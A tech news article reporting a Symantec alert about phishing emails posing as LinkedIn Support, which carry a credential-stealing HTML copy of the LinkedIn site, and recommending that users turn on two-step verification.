Advertisment

Scammers use LinkedIn security update to steal credentials

Security vendor, Symantec issued an alert in the wake of an increasing number of phishing emails over the last week- claiming to be from LinkedIn Support.

author-image
Soma Tah
New Update
ID

BANGALORE, INDIA: Security vendor, Symantec issued an alert in the wake of an increasing number of phishing emails over the last week- claiming to be from LinkedIn Support.

Advertisment

The body of the email claims that irregular activities have prompted a “compulsory security update” for the recipients’ LinkedIn account.

The email goes on to say that in order to secure their account, the recipient needs to download the attached form (an HTML attachment) and follow the instructions.

1

Advertisment

The attachment is a copy of the real LinkedIn.com website. However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker.

2

Curiously, the email uses a lowercase I instead of a capital i when spelling “LinkedIn”. The difference in characters is indiscernible to the eye and functions as a way to evade mail filters.

Advertisment

However, the most important technique used here is the HTML attachment. This method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished.

LinkedIn users should consider turning on two-step verification, a true “security update” that provides an extra layer of security. With two-step verification enabled, even if a user’s credentials are compromised, an attacker would not be able to login without having access to the user’s mobile phone.

To learn more about LinkedIn’s two-step verification, please visit its help center.

tech-news security